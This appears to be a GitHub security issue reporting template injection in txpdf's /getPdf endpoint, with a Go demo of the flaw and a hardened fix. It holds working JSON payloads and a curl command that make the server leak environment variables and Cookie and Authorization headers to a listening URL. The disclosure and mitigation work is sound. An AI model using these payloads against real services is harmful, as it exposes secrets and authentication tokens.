Data exfil due to user controlled template
jessesomerville opened this issue · comments
The /getPdf endpoint takes the body of the POST request and uses it as a text/template with the functions provided by sprig.TxtFuncMap(). This allows for the exfil of the server's environment variables and potentially auth tokens included in the request by middleware.
input.json:
{
"options": {
"print_media_type": true
},
"pages": [
{
"Location": "http://localhost:8000?{{env .UserAgent}}"
}
]
}
curl -d '@input.json' -X POST http://localhost:8080/getPdf -A "PWD" --output test.pdf
Log from python -m http.server:
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [04/Mar/2023 17:15:05] "GET /?/home/jsomerville/go/src/github.com/txn2/txpdf HTTP/1.1" 200 -
Or if this is running as a microservice you could steal the request headers that may have been added for S2S auth:
{
"options": {
"print_media_type": true
},
"pages": [
{
"Location": "http://localhost:8000?{{.Header.Get `Cookie`}};;{{.Header.Get `Authorization`}}"
}
]
}
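The following is an added example and is not txpdf's own code. It reproduces the pattern the issue describes with only the standard library: a caller-supplied Location string is parsed as a text/template and executed with the incoming *http.Request as the dot value, and a FuncMap standing in for sprig.TxtFuncMap() exposes env (sprig's env is os.Getenv). Both payloads from the issue are rendered through that vulnerable path, then the same payload is passed through a hardened path that never evaluates the string and only checks that it is an absolute http(s) URL. The function names, the environment variable TXPDF_DEMO_SECRET, and the header and secret values are constructed for the demonstration.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"os"
	"text/template"
)

// funcs stands in for sprig.TxtFuncMap(): sprig's "env" is os.Getenv, which is
// the only sprig function the issue's first payload needs.
var funcs = template.FuncMap{"env": os.Getenv}

// The two payloads from the issue, unchanged.
const (
	envPayload    = "http://localhost:8000?{{env .UserAgent}}"
	headerPayload = "http://localhost:8000?{{.Header.Get `Cookie`}};;{{.Header.Get `Authorization`}}"
)

// renderLocationVulnerable mirrors the pattern described in the issue: the
// caller-supplied Location is parsed as a template and executed with the
// request as dot. Everything reachable from the request (headers, UserAgent)
// and from the FuncMap (env) is available to whoever wrote the Location.
func renderLocationVulnerable(loc string, r *http.Request) (string, error) {
	t, err := template.New("Location").Funcs(funcs).Parse(loc)
	if err != nil {
		return "", err
	}
	var out bytes.Buffer
	if err := t.Execute(&out, r); err != nil {
		return "", err
	}
	return out.String(), nil
}

// renderLocationSafe never evaluates the string. It only checks that the value
// is an absolute http(s) URL and returns it unchanged, so "{{...}}" stays
// literal bytes in the query string instead of being executed.
func renderLocationSafe(loc string) (string, error) {
	u, err := url.Parse(loc)
	if err != nil {
		return "", err
	}
	if (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" {
		return "", errors.New("Location must be an absolute http(s) URL")
	}
	return loc, nil
}

// demoRequest builds a constructed request shaped like the issue's curl call:
// User-Agent names an environment variable, and headers that an auth or
// service-mesh middleware might have added are present.
func demoRequest() *http.Request {
	r := httptest.NewRequest(http.MethodPost, "http://localhost:8080/getPdf", nil)
	r.Header.Set("User-Agent", "TXPDF_DEMO_SECRET") // constructed variable name
	r.Header.Set("Cookie", "session=deadbeef")       // constructed value
	r.Header.Set("Authorization", "Bearer s2s-token") // constructed value
	return r
}

// runDemo sets a constructed environment variable, renders both payloads
// through the vulnerable path, and passes the first one through the safe path.
func runDemo() (vulnEnv, vulnHeaders, safeEnv string, safeErr error) {
	os.Setenv("TXPDF_DEMO_SECRET", "/home/user/go/src/example") // constructed value
	r := demoRequest()
	vulnEnv, _ = renderLocationVulnerable(envPayload, r)
	vulnHeaders, _ = renderLocationVulnerable(headerPayload, r)
	safeEnv, safeErr = renderLocationSafe(envPayload)
	return
}

func main() {
	vulnEnv, vulnHeaders, safeEnv, safeErr := runDemo()
	fmt.Println("vulnerable (env):    ", vulnEnv)
	fmt.Println("vulnerable (headers):", vulnHeaders)
	fmt.Println("safe:                ", safeEnv, safeErr)
}
```

The vulnerable path yields the environment variable's value and the Cookie and Authorization headers in the URL that the PDF renderer would then fetch, which is exactly the leak shown in the http.server log above. The hardened path leaves the template syntax inert; if Location values genuinely need templating, the equivalent mitigation is to execute with an empty FuncMap and nil data, so that `env` fails at parse time and `.Header` fails at execution time, rather than to hand user input to a template engine that can reach the request.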
added security section to README